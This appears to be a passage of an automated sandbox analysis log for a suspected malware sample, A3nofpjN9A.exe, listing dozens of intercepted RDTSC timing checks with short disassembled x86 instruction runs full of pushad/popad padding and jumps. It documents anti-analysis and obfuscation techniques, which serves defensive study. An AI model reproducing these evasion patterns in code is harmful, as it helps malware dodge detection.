Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C875C7 second address: C87603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jc 00007F5FC0E77A06h 0x0000000f jmp 00007F5FC0E77A10h 0x00000014 jc 00007F5FC0E77A06h 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F5FC0E77A13h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87603 second address: C8760B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8760B second address: C87610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87610 second address: C87615 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C878BF second address: C878C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5FC0E77A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87A14 second address: C87A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5FC0CE52D2h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F5FC0CE52C6h 0x00000013 pop ebx 0x00000014 popad 0x00000015 jc 00007F5FC0CE52D6h 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C87A42 second address: C87A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D166 second address: C8D16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D16A second address: C8D195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007F5FC0E77A18h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D195 second address: C8D1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5FC0CE52C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D1B4 second address: C8D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C8D1B9 second address: C8D1CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C915E7 second address: C915EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C915EB second address: C915FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F5FC0CE52EFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91884 second address: C91889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91889 second address: C918A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5FC0CE52D1h 0x00000008 jg 00007F5FC0CE52C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918A5 second address: C918B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918B2 second address: C918BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C918BA second address: C918BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A1D second address: C91A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A21 second address: C91A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A29 second address: C91A34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91A34 second address: C91A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BBD second address: C91BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5FC0CE52C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BCB second address: C91BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BE2 second address: C91BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BE6 second address: C91BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 js 00007F5FC0E77A1Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BF9 second address: C91BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C91BFD second address: C91C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69424 second address: C44833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5FC0CE52CEh 0x0000000f pop edx 0x00000010 nop 0x00000011 jmp 00007F5FC0CE52D9h 0x00000016 lea eax, dword ptr [ebp+1248B18Eh] 0x0000001c jg 00007F5FC0CE52C8h 0x00000022 mov edi, dword ptr [ebp+122D283Eh] 0x00000028 push eax 0x00000029 push edi 0x0000002a jmp 00007F5FC0CE52D2h 0x0000002f pop edi 0x00000030 mov dword ptr [esp], eax 0x00000033 mov cl, FDh 0x00000035 call dword ptr [ebp+122D1857h] 0x0000003b jno 00007F5FC0CE52E8h 0x00000041 jo 00007F5FC0CE52DCh 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69550 second address: C69555 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69555 second address: C695FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a pushad 0x0000000b jmp 00007F5FC0CE52CEh 0x00000010 push edx 0x00000011 mov edi, ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dh, ACh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 xor edi, dword ptr [ebp+1244CB16h] 0x0000002b mov edi, ebx 0x0000002d mov dword ptr [ebp+1248B1E6h], esp 0x00000033 movzx edi, dx 0x00000036 cmp dword ptr [ebp+122D29CEh], 00000000h 0x0000003d jne 00007F5FC0CE5398h 0x00000043 jmp 00007F5FC0CE52CCh 0x00000048 push edi 0x00000049 sbb cx, C690h 0x0000004e pop ecx 0x0000004f mov byte ptr [ebp+122D1865h], 00000047h 0x00000056 mov di, C0C9h 0x0000005a mov eax, D49AA7D2h 0x0000005f push 00000000h 0x00000061 push esi 0x00000062 call 00007F5FC0CE52C8h 0x00000067 pop esi 0x00000068 mov dword ptr [esp+04h], esi 0x0000006c add dword ptr [esp+04h], 00000019h 0x00000074 inc esi 0x00000075 push esi 0x00000076 ret 0x00000077 pop esi 0x00000078 ret 0x00000079 ja 00007F5FC0CE52CCh 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 jo 00007F5FC0CE52C6h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C695FC second address: C69613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69F09 second address: C69F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C69F0F second address: C69F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jne 00007F5FC0E77A10h 0x0000000d je 00007F5FC0E77A0Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A785 second address: C6A81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e and edi, 0A6E3E66h 0x00000014 lea eax, dword ptr [ebp+1248B1D2h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F5FC0CE52C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push eax 0x00000035 je 00007F5FC0CE52D4h 0x0000003b jmp 00007F5FC0CE52CEh 0x00000040 mov dword ptr [esp], eax 0x00000043 mov dword ptr [ebp+122D3572h], edx 0x00000049 call 00007F5FC0CE52D3h 0x0000004e add dword ptr [ebp+122D22C7h], ebx 0x00000054 pop ecx 0x00000055 lea eax, dword ptr [ebp+1248B18Eh] 0x0000005b mov edx, edi 0x0000005d nop 0x0000005e pushad 0x0000005f jng 00007F5FC0CE52CCh 0x00000065 jnl 00007F5FC0CE52C6h 0x0000006b push edi 0x0000006c pushad 0x0000006d popad 0x0000006e pop edi 0x0000006f popad 0x00000070 push eax 0x00000071 pushad 0x00000072 jo 00007F5FC0CE52CCh 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A81F second address: C6A828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96DBA second address: C96DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EE5 second address: C96EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EEB second address: C96EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C96EF4 second address: C96EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C973E0 second address: C973FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D9h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C973FE second address: C97447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5FC0E77A06h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F5FC0E77A0Ah 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 jo 00007F5FC0E77A16h 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F5FC0E77A0Eh 0x00000024 jmp 00007F5FC0E77A13h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C97447 second address: C9744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9744D second address: C97451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C97451 second address: C97455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C97715 second address: C9771B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9771B second address: C97741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5FC0CE52CAh 0x0000000d jmp 00007F5FC0CE52D4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA0258 second address: CA0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA0260 second address: CA0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9ED78 second address: C9ED91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9FC75 second address: C9FC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5FC0CE52D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9FC94 second address: C9FC9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C9FC9A second address: C9FCA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA440D second address: CA4417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4417 second address: CA4426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jne 00007F5FC0CE52C6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA45B6 second address: CA45BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA46C7 second address: CA46D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA46D3 second address: CA46F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F5FC0E77A0Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e js 00007F5FC0E77A06h 0x00000014 jnp 00007F5FC0E77A06h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA46F7 second address: CA4703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4952 second address: CA4958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4958 second address: CA4982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F5FC0CE52CAh 0x0000000b jmp 00007F5FC0CE52D9h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4C83 second address: CA4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0E77A16h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4CA4 second address: CA4CAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4E19 second address: CA4E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F5FC0E77A0Bh 0x0000000f pop ebx 0x00000010 jbe 00007F5FC0E77A0Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4E37 second address: CA4E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4E3F second address: CA4E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jns 00007F5FC0E77A0Ah 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4E6D second address: CA4E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA4FFD second address: CA5003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA5003 second address: CA5012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F5FC0CE52C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA5173 second address: CA517D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5FC0E77A0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CA3FE6 second address: CA3FED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C14783 second address: C147A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5FC0E77A06h 0x0000000a popad 0x0000000b jp 00007F5FC0E77A08h 0x00000011 pushad 0x00000012 jnp 00007F5FC0E77A0Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C147A1 second address: C147B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5FC0CE52CDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CAA9FE second address: CAAA22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CAD4C0 second address: CAD4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F5FC0CE52C8h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5FC0CE52CBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB236E second address: CB238D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0E77A1Ah 0x00000008 jmp 00007F5FC0E77A14h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB1683 second address: CB1695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a jne 00007F5FC0CE52CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB17E2 second address: CB1809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5FC0E77A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A0Ch 0x00000011 jmp 00007F5FC0E77A0Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB1809 second address: CB180D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB656E second address: CB6572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB6572 second address: CB6576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB6576 second address: CB6582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
